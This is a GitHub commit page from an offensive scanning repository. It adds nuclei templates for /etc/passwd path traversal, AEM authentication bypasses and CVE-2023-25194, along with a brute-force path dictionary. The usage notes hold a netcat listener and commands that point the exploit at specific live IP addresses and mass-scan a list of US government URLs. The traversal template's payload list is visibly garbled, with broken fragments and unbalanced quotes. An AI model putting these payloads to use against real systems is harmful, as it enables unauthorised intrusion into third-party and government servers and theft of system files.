Skip to content

Commit 2cccf37

Browse files
committed
add TPALL 2023-03-02
1 parent 87488d0 commit 2cccf37

File tree

3,399 files changed

+119575
-4
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

3,399 files changed

+119575
-4
lines changed

brute/dicts/filedic.txt

Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7050,6 +7050,14 @@ $metadata
70507050
/example.php
70517051
/examples
70527052
/examples/
7053+
/conf5
7054+
/privacy/policy/ms/version
7055+
/v5/gc
7056+
/v5/gcf
7057+
/snsconf
7058+
/v5/gcl
7059+
/v4/imopenstat/im_native_sdk_report
7060+
/privacy/policy/authorization/status
70537061
/examples/index.html
70547062
/examples/jsp/index.html
70557063
/examples/jsp/jsp2/misc/config.jsp

config/51pwn/CVE-2023-25194.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@ info:
2222
nc -nlvp 9999
2323
nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://176.79.33.152:7001
2424
nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://135.181.39.55:8123
25-
cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -v
25+
cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|sort -u|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -json -o us_gov_CVE-2023-25194.json
2626
reference:
2727
- https://hackerone.com/reports/1529790
2828
- https://github.com/ohnonoyesyes/CVE-2023-25194

config/51pwn/TPALL/2.yaml

Lines changed: 110 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,110 @@
1+
id: Etc-file
2+
3+
4+
5+
info:
6+
name: Etc File Read
7+
author: Saimon
8+
severity: high
9+
description: Finds etc password files
10+
11+
12+
13+
14+
requests:
15+
- method: GET
16+
17+
path:
18+
- |
19+
- "{{BaseURL}}swd"
20+
- "{{BaseURL}}passwd"
21+
- "{{BaseURL}}tc/passwd{{BaseURL}}"
22+
- "{{BaseURL}}"
23+
- "{{BaseURL}}"
24+
- "{{BaseURL}}asswd"
25+
- "{{BaseURL}}etc/passwd"
26+
- "{{BaseURL}}.%2f/etc/passwd"
27+
- "{{BaseURL}}.%2f..%2f/etc/passwd"
28+
- "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
29+
- "{{BaseURL}}""
30+
- "
31+
- "{{BaseURL}}passwd"
32+
- "{{BaseURL}}e//etc/passwd"
33+
- "{{BaseURL}}e/%2e%2e//etc/passwd"
34+
- "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
35+
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
36+
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
37+
- "
38+
- "{{BaseURL}}swd"
39+
- "{{BaseURL}}f/etc/passwd"
40+
- "{{BaseURL}}f%2e%2e%2f/etc/passwd"
41+
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
42+
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
43+
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
44+
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
45+
- "{{BaseURL}}""
46+
- "
47+
- "{{BaseURL}}passwd"
48+
- "{{BaseURL}}2f/etc/passwd"
49+
- "{{BaseURL}}2f..%252f/etc/passwd"
50+
- "{{BaseURL}}2f..%252f..%252f/etc/passwd"
51+
- "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
52+
- "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
53+
- "
54+
- "{{BaseURL}}/passwd"
55+
- "{{BaseURL}}e%252e//etc/passwd"
56+
- "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
57+
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
58+
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
59+
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
60+
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
61+
- "
62+
- "{{BaseURL}}252f/etc/passwd"
63+
- "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
64+
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
65+
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
66+
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
67+
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
68+
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
69+
- "{{BaseURL}}"
70+
- "{{BaseURL}}"
71+
- "{{BaseURL}}"
72+
- "{{BaseURL}}""
73+
- "
74+
- "{{BaseURL}}swd"
75+
- "{{BaseURL}}passwd"
76+
- "{{BaseURL}}tc/passwd{{BaseURL}}"
77+
- "{{BaseURL}}""
78+
- "
79+
- "{{BaseURL}}passwd"
80+
- "{{BaseURL}}5c/etc/passwd"
81+
- "{{BaseURL}}5c..%255c/etc/passwd"
82+
- "{{BaseURL}}5c..%255c..%255c/etc/passwd"
83+
- "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
84+
- "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
85+
- "
86+
- "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
87+
- "{{BaseURL}}""
88+
- "
89+
- "{{BaseURL}}asswd"
90+
- "{{BaseURL}}etc/passwd"
91+
- "{{BaseURL}}.%5c/etc/passwd"
92+
- "{{BaseURL}}.%5c..%5c/etc/passwd"
93+
- "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
94+
- "{{BaseURL}}""
95+
- "
96+
- "{{BaseURL}}passwd"
97+
- "{{BaseURL}}e\/etc/passwd"
98+
- "{{BaseURL}}e\%2e%2e\/etc/passwd"
99+
100+
matcher-condition: and
101+
matchers:
102+
- type: status
103+
status:
104+
- 200
105+
- type: regex
106+
regex:
107+
- "root:[x*] :0:0"
108+
- "\\[(font|extension|file)s\\]"
109+
110+
part: body
Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
id: 74cms-workflow
2+
3+
info:
4+
name: 74cms Security Checks
5+
author: daffainfo
6+
description: A simple workflow that runs all 74cms related nuclei templates on a given target.
7+
8+
workflows:
9+
- template: technologies/fingerprinthub-web-fingerprints.yaml
10+
matchers:
11+
- name: 74cms
12+
subtemplates:
13+
- tags: 74cms

config/51pwn/TPALL/AEM_misconfig.yaml

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
id: aem-misconfigs
2+
3+
info:
4+
name: Misconfigs and Auth bypasses for older unpatched AEM versions not an exhaustive list but ones Ive had luck with
5+
author: panch0r3d
6+
severity: high
7+
8+
requests:
9+
- method: GET
10+
path:
11+
- "{{BaseURL}}/apps/system/config/.tidy.-1.json?.css"
12+
- "{{BaseURL}}/bin/querybuilder.json?path=/apps/system/config&p.hits=full&p.limit=-1?.js"
13+
- "{{BaseURL}}/crx/de/index.jsp?.js"
14+
- "{{BaseURL}}/crx/explorer/browser/index.jsp?.css"
15+
- "{{BaseURL}}/crx/packmgr/index.jsp?.json"
16+
- "{{BaseURL}}/bin/querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
17+
- "{{BaseURL}}/bin/querybuilder.json?p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alastModifiedBy&property.operation=unequals&property.value=admin&type=nt%3abase&p.limit=1000&p.start=1?.js"
18+
- "{{BaseURL}}/libs/granite/core/content/login.html?.ico"
19+
- "{{BaseURL}}/etc/reports/diskusage.html?.html"
20+
- "{{BaseURL}}///crx///de///index.jsp?.css"
21+
- "{{BaseURL}}///bin///querybuilder.json?fulltext=web&p.limit=300&p.start=1?.html"
22+
headers:
23+
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
24+
matchers-condition: and
25+
matchers:
26+
- type: regex
27+
regex:
28+
- '(success).*?["][:](true).*?["](results)'
29+
- '(CRXDE).(Lite)'
30+
- '(Content).(Explorer)'
31+
- '(CRX).(Package).(Manager)'
32+
- '(Adobe)'
33+
part: body

0 commit comments

Comments
 (0)